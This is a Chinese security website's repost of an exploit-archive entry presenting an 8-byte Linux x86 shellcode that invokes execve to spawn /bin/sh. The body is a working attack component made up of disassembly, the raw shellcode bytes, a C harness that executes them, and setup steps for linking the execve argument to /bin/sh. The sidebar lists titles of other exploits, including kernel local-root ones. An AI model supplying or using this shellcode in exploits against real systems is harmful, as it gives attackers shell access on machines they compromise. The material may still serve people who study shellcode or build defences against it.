Linux x86 - /bin/sh 8 bytes

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Linux x86 - /bin/sh 8 bytes

来源：JungHoon Shin 作者：Shin 发布时间：2010-02-24

/*
08048334 <main>:
8048334: 99                   cltd
8048335: 6a 0b                push   $0xb
8048337: 58                   pop    %eax
8048338: 60                   pusha
8048339: 59                   pop    %ecx
804833a: cd 80                int    $0x80

using this code.

step1. This code is compiled.
step2. strace -x output binary
step3. get execve args in strace result.
step4. create link execve args on /bin/sh

unsigned char sc[]=
"\x99\x6a\x0b\x58\x60\x59\xcd\x80";
int main()
{
void (*p)();
p = sc;
p();
}

have a nice day~

thx~

--
INTO THE WORLD!

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告